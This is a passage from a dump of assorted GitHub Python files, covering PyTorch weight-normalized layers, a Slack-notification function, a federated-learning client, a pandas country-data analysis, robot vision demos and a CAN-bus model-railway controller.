__init__(\n\t\t\tself,\n\t\t\tci: int,\n\t\t\tco: int,\n\t\t\tstride: int,\n\t\t\tact_fn: str,\n\t\t\tuse_bn: bool,\n\t\t\t**kwargs,\n\t):\n\t\tsuper(ConvLayer, self).__init__()\n\t\tdefaults = {\n\t\t\t'in_channels': ci,\n\t\t\t'out_channels': co,\n\t\t\t'kernel_size': 3,\n\t\t\t'normalize_dim': 0,\n\t\t\t'reg_lognorm': True,\n\t\t\t'init_scale': 1.0,\n\t\t\t'stride': abs(stride),\n\t\t\t'padding': 1,\n\t\t\t'dilation': 1,\n\t\t\t'groups': 1,\n\t\t\t'bias': True,\n\t\t}\n\t\tif stride == -1:\n\t\t\tself.upsample = nn.Upsample(\n\t\t\t\tscale_factor=MULT,\n\t\t\t\tmode='nearest',\n\t\t\t)\n\t\telse:\n\t\t\tself.upsample = None\n\t\tif use_bn:\n\t\t\tself.bn = nn.BatchNorm2d(ci)\n\t\telse:\n\t\t\tself.bn = None\n\t\tself.act_fn = get_act_fn(act_fn, False)\n\t\tkwargs = setup_kwargs(defaults, kwargs)\n\t\tself.conv = Conv2D(**kwargs)\n\n\tdef forward(self, x):\n\t\tif self.bn is not None:\n\t\t\tx = self.bn(x)\n\t\tif self.act_fn is not None:\n\t\t\tx = self.act_fn(x)\n\t\tif self.upsample is not None:\n\t\t\tx = self.upsample(x)\n\t\tx = self.conv(x)\n\t\treturn x\n\n\nclass Conv1D(nn.Conv1d):\n\tdef __init__(\n\t\t\tself,\n\t\t\tin_channels: int,\n\t\t\tout_channels: int,\n\t\t\tkernel_size: int,\n\t\t\tnormalize_dim: int = 0,\n\t\t\treg_lognorm: bool = True,\n\t\t\tinit_scale: float = 1.0,\n\t\t\t**kwargs,\n\t):\n\t\tkwargs = filter_kwargs(nn.Conv1d, kwargs)\n\t\tself.pad = kernel_size - 1\n\t\tkwargs['padding'] = self.pad\n\t\tsuper(Conv1D, self).__init__(\n\t\t\tin_channels=in_channels,\n\t\t\tout_channels=out_channels,\n\t\t\tkernel_size=kernel_size,\n\t\t\t**kwargs,\n\t\t)\n\t\tassert init_scale > 0\n\t\tself.dims, self.shape = _dims(normalize_dim, 3)\n\t\tinit = torch.ones(self.out_channels).mul(init_scale)\n\t\tself.lognorm = nn.Parameter(\n\t\t\tdata=torch.log(init),\n\t\t\trequires_grad=reg_lognorm,\n\t\t)\n\t\tself._normalize_weight()\n\n\tdef forward(self, x):\n\t\tself._normalize_weight()\n\t\treturn F.conv1d(\n\t\t\tinput=x,\n\t\t\tweight=self.w,\n\t\t\tbias=self.bias,\n\t\t\tstride=self.stride,\n\t\t\tpadding=self.padding,\n\t\t\tdilation=self.dilation,\n\t\t\tgroups=self.groups,\n\t\t)[..., :-self.pad].contiguous()\n\n\tdef _normalize_weight(self):\n\t\tself.w = _normalize(\n\t\t\tlognorm=self.lognorm,\n\t\t\tweight=self.weight,\n\t\t\tshape=self.shape,\n\t\t\tdims=self.dims,\n\t\t)\n\n\nclass Conv2D(nn.Conv2d):\n\tdef __init__(\n\t\t\tself,\n\t\t\tin_channels: int,\n\t\t\tout_channels: int,\n\t\t\tkernel_size: int,\n\t\t\tnormalize_dim: int = 0,\n\t\t\treg_lognorm: bool = True,\n\t\t\tinit_scale: float = 1.0,\n\t\t\t**kwargs,\n\t):\n\t\tkwargs = filter_kwargs(nn.Conv2d, kwargs)\n\t\tsuper(Conv2D, self).__init__(\n\t\t\tin_channels=in_channels,\n\t\t\tout_channels=out_channels,\n\t\t\tkernel_size=kernel_size,\n\t\t\t**kwargs,\n\t\t)\n\t\tassert init_scale > 0\n\t\tself.dims, self.shape = _dims(normalize_dim, 4)\n\t\tinit = torch.ones(self.out_channels).mul(init_scale)\n\t\tself.lognorm = nn.Parameter(\n\t\t\tdata=torch.log(init),\n\t\t\trequires_grad=reg_lognorm,\n\t\t)\n\t\tself._normalize_weight()\n\n\tdef forward(self, x):\n\t\tself._normalize_weight()\n\t\treturn F.conv2d(\n\t\t\tinput=x,\n\t\t\tweight=self.w,\n\t\t\tbias=self.bias,\n\t\t\tstride=self.stride,\n\t\t\tpadding=self.padding,\n\t\t\tdilation=self.dilation,\n\t\t\tgroups=self.groups,\n\t\t)\n\n\tdef _normalize_weight(self):\n\t\tself.w = _normalize(\n\t\t\tlognorm=self.lognorm,\n\t\t\tweight=self.weight,\n\t\t\tshape=self.shape,\n\t\t\tdims=self.dims,\n\t\t)\n\n\nclass DeConv2D(nn.ConvTranspose2d):\n\tdef __init__(\n\t\t\tself,\n\t\t\tin_channels: int,\n\t\t\tout_channels: int,\n\t\t\tkernel_size: Union[int, Tuple[int, int]],\n\t\t\tnormalize_dim: int = 1,\n\t\t\treg_lognorm: bool = True,\n\t\t\tinit_scale: float = 1.0,\n\t\t\t**kwargs,\n\t):\n\t\tkwargs = filter_kwargs(nn.ConvTranspose2d, kwargs)\n\t\tsuper(DeConv2D, self).__init__(\n\t\t\tin_channels=in_channels,\n\t\t\tout_channels=out_channels,\n\t\t\tkernel_size=kernel_size,\n\t\t\t**kwargs,\n\t\t)\n\t\tassert init_scale > 0\n\t\tself.dims, self.shape = _dims(normalize_dim, 4)\n\t\tinit = torch.ones(self.out_channels).mul(init_scale)\n\t\tself.lognorm = nn.Parameter(\n\t\t\tdata=torch.log(init),\n\t\t\trequires_grad=reg_lognorm,\n\t\t)\n\t\tself._normalize_weight()\n\n\tdef forward(self, x, output_size=None):\n\t\tself._normalize_weight()\n\t\treturn F.conv_transpose2d(\n\t\t\tinput=x,\n\t\t\tweight=self.w,\n\t\t\tbias=self.bias,\n\t\t\tstride=self.stride,\n\t\t\tpadding=self.padding,\n\t\t\tdilation=self.dilation,\n\t\t\tgroups=self.groups,\n\t\t)\n\n\tdef _normalize_weight(self):\n\t\tself.w = _normalize(\n\t\t\tlognorm=self.lognorm,\n\t\t\tweight=self.weight,\n\t\t\tshape=self.shape,\n\t\t\tdims=self.dims,\n\t\t)\n\n\nclass Linear(nn.Linear):\n\tdef __init__(\n\t\t\tself,\n\t\t\tin_features: int,\n\t\t\tout_features: int,\n\t\t\tnormalize_dim: int = 0,\n\t\t\treg_lognorm: bool = True,\n\t\t\tinit_scale: float = 1.0,\n\t\t\t**kwargs,\n\t):\n\t\tkwargs = filter_kwargs(nn.Linear, kwargs)\n\t\tsuper(Linear, self).__init__(\n\t\t\tin_features=in_features,\n\t\t\tout_features=out_features,\n\t\t\t**kwargs,\n\t\t)\n\t\tassert init_scale > 0\n\t\tself.dims, self.shape = _dims(normalize_dim, 2)\n\t\tinit = torch.ones(self.out_features).mul(init_scale)\n\t\tself.lognorm = nn.Parameter(\n\t\t\tdata=torch.log(init),\n\t\t\trequires_grad=reg_lognorm,\n\t\t)\n\t\tself._normalize_weight()\n\n\tdef forward(self, x):\n\t\tself._normalize_weight()\n\t\treturn F.linear(\n\t\t\tinput=x,\n\t\t\tweight=self.w,\n\t\t\tbias=self.bias,\n\t\t)\n\n\tdef _normalize_weight(self):\n\t\tself.w = _normalize(\n\t\t\tlognorm=self.lognorm,\n\t\t\tweight=self.weight,\n\t\t\tshape=self.shape,\n\t\t\tdims=self.dims,\n\t\t)\n\n\nclass RotConv2d(nn.Conv2d):\n\tdef __init__(\n\t\t\tself,\n\t\t\tco: int,\n\t\t\tn_rots: int,\n\t\t\tkernel_size: Union[int, Iterable[int]],\n\t\t\tbias: bool = True,\n\t\t\tgain: bool = True,\n\t\t\t**kwargs,\n\t):\n\t\tsuper(RotConv2d, self).__init__(\n\t\t\tin_channels=2,\n\t\t\tout_channels=co,\n\t\t\tkernel_size=kernel_size,\n\t\t\tpadding='valid',\n\t\t\tbias=bias,\n\t\t\t**kwargs,\n\t\t)\n\t\tself.n_rots = n_rots\n\t\tself._build_rot_mat()\n\t\tif bias:\n\t\t\tbias = nn.Parameter(\n\t\t\t\ttorch.zeros(co*n_rots),\n\t\t\t\trequires_grad=True,\n\t\t\t)\n\t\telse:\n\t\t\tbias = None\n\t\tself.bias = bias\n\t\tif gain:\n\t\t\tgain = nn.Parameter(\n\t\t\t\ttorch.ones(co*n_rots),\n\t\t\t\trequires_grad=True,\n\t\t\t)\n\t\telse:\n\t\t\tgain = None\n\t\tself.gain = gain\n\t\tself.w = self.augment_weight()\n\n\tdef forward(self, x):\n\t\tself.w = self.augment_weight()\n\t\treturn F.conv2d(\n\t\t\tinput=x,\n\t\t\tweight=self.w,\n\t\t\tbias=self.bias,\n\t\t\tstride=self.stride,\n\t\t\tpadding=self.padding,\n\t\t\tdilation=self.dilation,\n\t\t\tgroups=self.groups,\n\t\t)\n\n\tdef _build_rot_mat(self):\n\t\tthetas = np.deg2rad(np.arange(\n\t\t\t0, 360, 360 / self.n_rots))\n\t\tu = [0.0, 0.0, 1.0]\n\t\tu = np.array(u).reshape(1, -1)\n\t\tu = np.repeat(u, self.n_rots, 0)\n\t\tu *= thetas.reshape(-1, 1)\n\t\tr = Rotation.from_rotvec(u)\n\t\tr = r.as_matrix()\n\t\tr = torch.tensor(\n\t\t\tdata=r[:, :2, :2],\n\t\t\tdtype=torch.float,\n\t\t)\n\t\tself.register_buffer('rot_mat', r)\n\t\treturn\n\n\tdef augment_weight(self, eps=1e-12):\n\t\twn = torch.linalg.vector_norm(\n\t\t\tx=self.weight,\n\t\t\tdim=[1, 2, 3],\n\t\t\tkeepdim=True,\n\t\t)\n\t\tw = torch.einsum(\n\t\t\t'rij, kjxy -> krixy',\n\t\t\tself.rot_mat,\n\t\t\tself.weight / (wn + eps),\n\t\t).flatten(end_dim=1)\n\t\tif self.gain is not None:\n\t\t\tw *= self.gain.view(-1, 1, 1, 1)\n\t\treturn w\n\n\nclass AddNorm(object):\n\tdef __init__(self, norm, types, **kwargs):\n\t\tsuper(AddNorm, self).__init__()\n\t\tself.norm = norm\n\t\tself.types = types\n\t\tif self.norm == 'spectral':\n\t\t\tself.kwargs = filter_kwargs(\n\t\t\t\tfn=nn.utils.parametrizations.spectral_norm,\n\t\t\t\tkw=kwargs,\n\t\t\t)\n\t\telif self.norm == 'weight':\n\t\t\tself.kwargs = filter_kwargs(\n\t\t\t\tfn=nn.utils.weight_norm,\n\t\t\t\tkw=kwargs,\n\t\t\t)\n\t\telse:\n\t\t\traise NotImplementedError\n\n\tdef get_fn(self) -> Callable:\n\t\tif self.norm == 'spectral':\n\t\t\tdef fn(m):\n\t\t\t\tif isinstance(m, self.types):\n\t\t\t\t\tnn.utils.parametrizations.spectral_norm(\n\t\t\t\t\t\tmodule=m, **self.kwargs)\n\t\t\t\treturn\n\t\telif self.norm == 'weight':\n\t\t\tdef fn(m):\n\t\t\t\tif isinstance(m, self.types):\n\t\t\t\t\tnn.utils.weight_norm(\n\t\t\t\t\t\tmodule=m, **self.kwargs)\n\t\t\t\treturn\n\t\telse:\n\t\t\traise NotImplementedError\n\t\treturn fn\n\n\ndef _normalize(lognorm, weight, shape, dims, eps=1e-8):\n\tn = torch.exp(lognorm).view(shape)\n\twn = torch.linalg.vector_norm(\n\t\tx=weight, dim=dims, keepdim=True)\n\treturn n * weight / (wn + eps)\n\n\ndef _dims(normalize_dim, ndims):\n\tassert normalize_dim in [0, 1]\n\tdims = list(range(ndims))\n\tshape = [\n\t\t1 if i != normalize_dim\n\t\telse -1 for i in dims\n\t]\n\tdims.pop(normalize_dim)\n\treturn dims, shape\n","repo_name":"hadivafaii/_MTMST","sub_path":"base/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":11805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70660771629","text":"import json\nimport requests\n\ndef read_secret(secret):\n f = open('/var/openfaas/secrets/' + secret)\n val = f.read()\n if val is None:\n raise Exception(\"Requires {0} secret in function namespace\".format(secret))\n f.close()\n return val\n\ndef handle(req):\n webhook_url = read_secret(\"slack_webhook\")\n message = req\n\n slack_data = {'text': message}\n \n response = requests.post(\n webhook_url, data=json.dumps(slack_data),\n headers={'Content-Type': 'application/json'}\n )\n return {\"status\": response.status_code}\n","repo_name":"davlloyd/openfaas-gitops","sub_path":"functions/slack-notify/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"72754889066","text":"from CVSOperator import CSVOperator\r\nimport numpy as np\r\nimport random as rd\r\nimport torch\r\nimport time\r\nimport torch.nn as nn\r\nfrom Net.neural_net_work import NeuralNetWork\r\nfrom torch.utils.data import DataLoader\r\n\r\ndef CrossEntropy_derivative(pred, label):\r\n if pred == 0:\r\n pred = 0.00001\r\n pred = (1/pred)*label - (1-label)/(1-pred)\r\n return -pred\r\n\r\nclass Client:\r\n def __init__(self, data_set, ID, model_path):\r\n self.client_id = ID\r\n self.path = data_set\r\n self.model_path = model_path\r\n self.csv_operator = CSVOperator(data_set, 'r')\r\n self.data_set, self.test_data_set = self.load_data()\r\n self.model = NeuralNetWork(input_dimension=len(self.data_set[0]), output_dimension=2)\r\n\r\n\r\n \r\n def train_local_model(self):\r\n self.local_model.model.learning_process(self.data_set)\r\n\r\n def save_model(self):\r\n self.model.save_model(self.client_id)\r\n \r\n def training_process(self): # 训练过程\r\n echo = 10\r\n loss_sum = 0\r\n loss_fn = nn.BCELoss() \r\n opimizer = torch.optim.SGD(self.model.parameters(), lr=0.01)\r\n flag = False # 用于标记是否训练完\r\n for e in range(echo):\r\n data = DataLoader(self.data_set, batch_size=30)\r\n for data_batch, label_batch in data:\r\n sample_ = torch.tensor(data_batch, dtype=torch.float32)\r\n label_ = torch.tensor(label_batch, dtype=torch.float32).unsqueeze(-1)\r\n pred = self.model(sample_)\r\n loss = loss_fn(pred, label_)\r\n loss_sum += loss.item()\r\n opimizer.zero_grad()\r\n loss.backward()\r\n opimizer.step()\r\n\r\n flag = True\r\n return flag\r\n\r\n\r\n\r\n def test(self, e): # 测试模型\r\n row = []\r\n title = [\"+\", \"-\", \"groundtrueth\"]\r\n time_cost_start = time.time()\r\n row.append(title)\r\n c = 0\r\n length = len(self.test_data_set[0]) # 我组织数据的时候标签放在第一个,可以根据自己需要调整\r\n for i in range(len(self.test_data_set)):\r\n sample_ = torch.tensor(self.test_data_set[i][1:length+1], dtype=torch.float32)\r\n res = self.model(sample_)\r\n res = res.detach().numpy()[0]\r\n row.append([res, 1-res, self.test_data_set[i][0]])\r\n c += 1\r\n time_cost_end = time.time()\r\n self.time_cost = time_cost_end-time_cost_start\r\n csv_writer = CSVOperator(\"result/\"+ str(e)+self.model_path, 'w')\r\n csv_writer.write_row(row)\r\n \r\n \r\n\r\n def load_data(self):\r\n data_set_train = []\r\n data_set_test = []\r\n data_set_all = []\r\n c = 0\r\n for row in self.csv_operator.reader:\r\n if c == 0:\r\n c += 1\r\n continue\r\n data_set_all.append(row)\r\n rd.seed(self.client_id) # 保证每一次随机的数据集都是一样的,因为论文实验需要可重复性,也方便分析\r\n rd.shuffle(data_set_all)\r\n for row in data_set_all:\r\n if c < np.floor(len(data_set_all)*0.7):\r\n data_set_train.append(np.array(row))\r\n else:\r\n data_set_test.append(np.array(row))\r\n c += 1\r\n \r\n return data_set_train, data_set_test\r\n\r\n\r\ndef data_format_conversion(data_row): # array转tensor\r\n data_row = np.array(data_row)\r\n data_input = torch.tensor(data_row, dtype=torch.float32)\r\n return data_input","repo_name":"big-Cat-123/FLFramework","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21204162701","text":"import numpy as np\n\ndef sample_without_replacement(policy):\n rankings = np.zeros(policy.shape, dtype=np.int)\n for batch_id in range(policy.shape[0]):\n\n # Sample according to the policy for each batch, add some small value to prevent 0 entries\n # from crashing the sampler.\n rankings[batch_id][:] = np.random.choice(policy.shape[1], size=policy.shape[1], replace=False, \\\n p=(policy[batch_id] + 1e-12))\n\n return rankings\n","repo_name":"Roxot/pgrank","sub_path":"explorers/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20605527316","text":"from typing import Optional, Sequence\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\n\nclass MLP(nn.Module):\n def __init__(self, dims: Sequence[int], sigmoid_pos: Optional[int] = None) -> None:\n super(MLP, self).__init__()\n layers = nn.ModuleList()\n if sigmoid_pos == -1:\n sigmoid_pos = len(dims) - 2\n\n for i, dim in enumerate(dims[:-1]):\n layers.append(nn.Linear(dim, dims[i + 1], bias=True))\n if i == sigmoid_pos:\n layers.append(nn.Sigmoid())\n else:\n layers.append(nn.ReLU())\n\n self.layers = nn.Sequential(*layers)\n self._init_weights()\n\n def _init_weights(self) -> None:\n for mod in self.modules():\n if isinstance(mod, nn.Linear):\n nn.init.normal_(\n mod.weight.data, 0.0, np.sqrt(2.0 / (mod.in_features + mod.out_features))\n )\n nn.init.normal_(mod.bias.data, 0.0, np.sqrt(1.0 / mod.out_features))\n\n def forward(self, inputs: torch.Tensor) -> torch.Tensor:\n output: torch.Tensor = self.layers(inputs)\n return output\n","repo_name":"KanchiShimono/torch-fm","sub_path":"src/torch_fm/nn/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1031973658","text":"import matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n\r\ndef readDataset(path):\r\n data = pd.read_csv(path, encoding=\"Windows-1252\", delimiter=';')\r\n return data\r\n\r\n\r\ndef fixIssues(data):\r\n data.rename(columns={\"Populatiion\": \"Population\"}, inplace=True)\r\n\r\n print(data.Region.unique())\r\n\r\n for i in range(data.shape[0]):\r\n if not data['GDP per capita'].isnull()[i]:\r\n data.loc[i, 'GDP per capita'] = abs(float(data.loc[i, 'GDP per capita'].replace(',', '.')))\r\n if not data['Population'].isnull()[i]:\r\n data.loc[i, 'Population'] = abs(int(data.loc[i, 'Population']))\r\n if not data['CO2 emission'].isnull()[i]:\r\n data.loc[i, 'CO2 emission'] = abs(float(data.loc[i, 'CO2 emission'].replace(',', '.')))\r\n if not data['Area'].isnull()[i]:\r\n data.loc[i, 'Area'] = abs(float(data.loc[i, 'Area'].replace(',', '.')))\r\n\r\n\r\ndef replaceBlank(data):\r\n gdp, popul, co2, area = map(float, data.mean())\r\n popul = int(popul)\r\n for i in range(data.shape[0]):\r\n if data['GDP per capita'].isnull()[i]:\r\n data.loc[i, 'GDP per capita'] = gdp\r\n if data['Population'].isnull()[i]:\r\n data.loc[i, 'Population'] = popul\r\n if data['CO2 emission'].isnull()[i]:\r\n data.loc[i, 'CO2 emission'] = co2\r\n if data['Area'].isnull()[i]:\r\n data.loc[i, 'Area'] = area\r\n return data\r\n\r\n\r\ndef boxPlot(data, value):\r\n plt.figure()\r\n plt.title('Діаграма розмаху для ' + value)\r\n plt.boxplot(data[value])\r\n\r\n\r\ndef histogram(data, value):\r\n plt.figure()\r\n plt.title('Гістограма для ' + value)\r\n plt.hist(x=data[value])\r\n\r\n\r\ndef addColumn(data):\r\n data['Density'] = data['Population'] / data['Area']\r\n return data\r\n\r\n\r\ndef maxAverageArea(data):\r\n regions = data.Region.unique()\r\n maxVal, maxReg = 0, 0\r\n for i in regions:\r\n d = data[data.Region == i]\r\n if d.Area.mean() > maxVal:\r\n maxVal = d.Area.mean()\r\n maxReg = i\r\n return maxVal, maxReg\r\n\r\n\r\ndef maxDensity(data, region=\"world\"):\r\n if region == \"world\":\r\n maxVal = data['Density'].max()\r\n else:\r\n maxVal = data[data.Region == region]['Density'].max()\r\n\r\n return maxVal, data[data['Density'] == maxVal][\"Country Name\"].iat[0]\r\n\r\n\r\ndef GDPbyRegions(data):\r\n regions = data.Region.unique()\r\n for i in regions:\r\n valMean = data[data.Region == i]['GDP per capita'].mean()\r\n valMedian = data[data.Region == i]['GDP per capita'].median()\r\n if abs(valMedian - valMean) <= min(valMedian, valMean) * 0.05:\r\n print(i, \"`s average and median are equal with the values of\", valMean, \"and\", valMedian)\r\n\r\n\r\nif __name__ == '__main__':\r\n data = readDataset(\"Data2.csv\")\r\n print(data.head())\r\n\r\n fixIssues(data)\r\n print(data)\r\n\r\n data = replaceBlank(data)\r\n print(data.head())\r\n\r\n print(data.info())\r\n\r\n boxPlot(data, 'GDP per capita')\r\n boxPlot(data, 'Population')\r\n boxPlot(data, 'CO2 emission')\r\n boxPlot(data, 'Area')\r\n\r\n histogram(data, 'GDP per capita')\r\n histogram(data, 'Population')\r\n histogram(data, 'CO2 emission')\r\n histogram(data, 'Area')\r\n plt.show()\r\n\r\n data = addColumn(data)\r\n print(data.head())\r\n\r\n print(\"The highest GDP per capita is in\",\r\n data[data['GDP per capita'] == data['GDP per capita'].max()][\"Country Name\"].iat[0],\r\n \"with the value of\", data['GDP per capita'].max())\r\n print(\"\\nThe country with the smallest area is\", data[data['Area'] == data['Area'].min()][\"Country Name\"].iat[0],\r\n \"with the value of\", data['Area'].min())\r\n\r\n maxVal, maxArea = maxAverageArea(data)\r\n print(\"\\nMaximum average area is\", maxVal, \"in\", maxArea)\r\n\r\n maxVal, maxArea = maxDensity(data)\r\n print(\"\\nMax density in the world is in\", maxArea, \"with the value of\", maxVal)\r\n maxVal, maxArea = maxDensity(data, \"Europe & Central Asia\")\r\n print(\"\\nMax density in Europe and Central Asia is in\", maxArea, \"with the value of\", maxVal)\r\n\r\n GDPbyRegions(data)\r\n\r\n dataByGDP = data.sort_values(\"GDP per capita\", ascending=False)\r\n print(\"\\n\", dataByGDP.head()[['Country Name', \"GDP per capita\"]], \"\\n\",\r\n dataByGDP.tail()[['Country Name', \"GDP per capita\"]])\r\n\r\n dataByCo2 = data[::]\r\n dataByCo2[\"CO2 per capita\"] = dataByCo2[\"CO2 emission\"] / dataByCo2[\"Population\"]\r\n dataByCo2 = dataByCo2.sort_values(\"CO2 per capita\", ascending=False)\r\n print(\"\\n\", dataByCo2.head()[['Country Name', \"CO2 per capita\"]], \"\\n\",\r\n dataByCo2.tail()[['Country Name', \"CO2 per capita\"]])\r\n\r\n dataByCo2.to_csv(\"dataByCo2.csv\")\r\n","repo_name":"expresoviter/KPI_Study","sub_path":"Semester_4/Data analysis in information systems/Lab3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19952543359","text":"from CV_Robot import robot\nfrom CV_Robot import vision\n\nvision.activate_camera()\nrobot.forward()\nwhile True:\n img = vision.get_camera_image()\n vision.show_objects(img)\n if vision.Objects.PERSON not in vision.find_objects(img):\n break\nrobot.stop()\n\n\nimport os\nfor item in os.listdir('Examples/Samples/100samples'):\n print(item)\n img = vision.load_image(\"Examples/Samples/100samples/\" + item)\n print(vision.find_objects(img))\n vision.show_objects(img)\n\nimg = vision.load_image(\"Examples/Samples/busy_street.jpg\")\nprint(vision.find_objects(img))\nvision.show_objects(img, pause=True)\n#\n# vision.activate_camera()\nvision.load_video(\"Examples/Samples/pedestrians.mp4\")\nwhile True:\n img = vision.get_camera_image()\n if img is None:\n break\n print(vision.find_objects(img))\n vision.show_objects(img)\n\n\n","repo_name":"RobertJN64/CV_Robot","sub_path":"Examples/cv_robot_test.py","file_name":"cv_robot_test.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10812902517","text":"import serial\nimport time\nimport timeit\nimport threading\nimport io\nimport __builtin__\n\n__builtin__.adres = 0\n__builtin__.c = threading.Condition()\n\n# typy urzadzen\nTYP_NONE = 0x00\nTYP_Zwrotnica = 0x01\nTYP_Semafor = 0x02\nTYP_Balisa = 0x03\n\n# strefy\nSTR_NONE = 0x00\nSTR_Strzyza = 0x01\nSTR_Kielpinek = 0x02\nSTR_Rebiechowo = 0x03\nSTR_Banino = 0x04\nSTR_Wrzeszcz = 0x05\n\n# semafory\nLED_GREEN = 0x31\nLED_YELLOW1 = 0x32\nLED_RED = 0x33\nLED_YELLOW2 = 0x34\nLED_WHITE = 0x35\nLED_OFF = 0x30\nLED_GET = 0x39\n\n# ramka:\n# 1: '>'\n# 4: addr hex in ascii\n# 1: space\n# 1: command\n# n: parameters\n# 1: '\\r'\n\nsemafor = []\nzwrotnica = []\nbalisa = []\n\n\nclass Agent:\n def __init__(self, addr='1F000000', strefa='', l_addr=None):\n self.address = addr\n self.strefa = strefa\n self.l_address = l_addr\n\n def send(self, data):\n msg = '>' + self.address + ' ' + data + '\\r'\n ser.write(msg.decode('unicode-escape'))\n\n @staticmethod\n def skanuj():\n ser.write(u'>1F000000 39\\r')\n\n def zmien_adres(self, strefa, adres):\n ser.write('61 ' + strefa + adres)\n self.address = strefa << 16 + adres\n\n\nclass Semafor:\n def __init__(self, addr, strefa, l_addr):\n self.agent = Agent(addr, strefa, l_addr)\n\n def wlacz(self, led):\n self.agent.send(led + ' 00')\n\n def mrugaj(self, led):\n self.agent.send('00 ' + led)\n\n def wylacz(self):\n self.agent.send('0x30 ' + '0x30')\n\n\nclass Zwrotnica:\n def __init__(self, addr, strefa, l_addr, stat, limit):\n self.agent = Agent(addr, strefa, l_addr)\n self.state = stat\n self.limiter = limit\n\n def lewo(self):\n self.agent.send('31')\n\n def prawo(self):\n self.agent.send('32')\n\n def wylacz(self):\n self.agent.send('30')\n\n\nclass Balisa:\n def __init__(self, addr, strefa, l_addr, stat, hist):\n self.agent = Agent(addr, strefa, l_addr)\n self.state = stat\n self.histereza = hist\n\n def wlacz(self, hist):\n self.histereza = hist\n self.agent.send('33 ' + str(self.histereza))\n\n def wylacz(self):\n self.agent.send('30')\n\n### KONIEC KLAS ###\ndef _readline():\n ms = []\n while True:\n c = ser.read(1)\n if c == '\\r':\n return ms\n else:\n ms.append(c)\n\n\ndef can_odb():\n while ser_raw.isOpen():\n reading = ser.readline()\n # print('odebralem: '+reading)\n handle_data(reading)\n print('can_odb koniec')\n\n\ndef sprawdz(items, key): # czy mamy juz taki adres w tablicy\n for item in items:\n if item.agent.address == key:\n return item\n return None\n\n\ntime1 = 0\nlast_time1 = 0\n\ndef handle_scan(data):\n global time1\n global last_time1\n\n address = data[1:9]\n typ = data[1:3]\n strefa = data[3:5]\n l_adres = data[5:9]\n attr1 = data[10:12]\n attr2 = data[13:15]\n attr3 = data[16:18]\n attr4 = data[19:21]\n\n if typ == '01':\n zwr = sprawdz(zwrotnica, address)\n if zwr:\n zwr.stat = attr1\n zwr.limiter = attr2\n else:\n zwrotnica.append(Zwrotnica(address, strefa, l_adres, attr1, attr3))\n\n elif typ == '02': # Semafor\n sem = sprawdz(semafor, address)\n if not sem:\n semafor.append(Semafor(address, strefa, l_adres))\n\n elif typ == '03': # Balisa\n bal = sprawdz(balisa, address)\n if bal:\n bal.state = attr1\n bal.histereza = attr2\n #if attr3 < '70': # wieksze tyl mniejsze przod dla pociagow 1 i 2\n __builtin__.c.acquire()\n __builtin__.adres = address\n __builtin__.c.release()\n # last_time1 = time1\n # time1 = time.clock() # aktualny czas\n # print u'balisa ' + l_adres + u'\\t' + str(time1 - last_time1)\n else:\n balisa.append(Balisa(address, strefa, l_adres, attr1, attr2))\n\n # doGUI(address)\n # for x in balisa:\n # if x.l_addr == l_adres:\n # print 'balisa ' + l_adres + '\\t' #+ end - start\n # return None\n # last_time = time\n # time = timeit.timeit()\n # print time-last_time\n # if typ == '03' and attr3 < '70': # wieksze tyl mniejsze przod\n # print data[16:18]\n # print u'time1 ' + str(time1)\n # print u'last_time ' + str(last_time1)\n # print (time1 - last_time1)\n\n\ndef handle_data(data):\n dat = data.split('\\r')\n for d in dat:\n handle_scan(d)\n\n # f = open('pkm_scan.txt', 'r')\n # data = f.read()\n # print data\n\n\nser_raw = serial.Serial(\n port='COM6',\n # port='COM21',\n baudrate=500000,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS\n)\n\nif ser_raw.isOpen():\n print('Serial is open: ')\nelse:\n print('Serial is closed!!')\nprint(ser_raw.portstr)\n\nser = io.TextIOWrapper(io.BufferedRWPair(ser_raw, ser_raw, 1),\n newline='\\r',\n line_buffering=True)\nser._CHUNK_SIZE = 1\n\n# watek odbioru\nwatek_odb = threading.Thread(target=can_odb)\nwatek_odb.start()\n\nser.write(u'master\\r')\nAgent.skanuj()\n\ntime.sleep(5)\nfor balisas in balisa: # ustawiamy automatyczne zglaszanie i histereze\n balisas.wlacz(0x70)\n time.sleep(0.5) # bez sleepa zapycha sie\n","repo_name":"vurumutu/PKM","sub_path":"CAN.py","file_name":"CAN.py","file_ext":"py","file_size_in_byte":5391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23631403405","text":"import exifread\n\ndef get_selected_exif(exif):\n selected_data = {\n 'EXIF DateTimeOriginal': '',\n 'EXIF FNumber': '',\n 'EXIF FocalLength': '',\n 'EXIF SubSecTimeOriginal': '',\n 'EXIF ExposureTime': '',\n 'EXIF ISOSpeedRatings': ''\n }\n\n for tag in exif.keys():\n if tag not in ('JPEGThumbnail', 'TIFFThumbnail', 'Filename', 'EXIF MakerNote'):\n if tag in selected_data:\n selected_data[tag] = '%s' % (exif[tag])\n return selected_data\n\ndef get_exif(filename):\n # Open image file for reading (must be in binary mode)\n f = open(filename, 'rb')\n tags = exifread.process_file(f)\n return 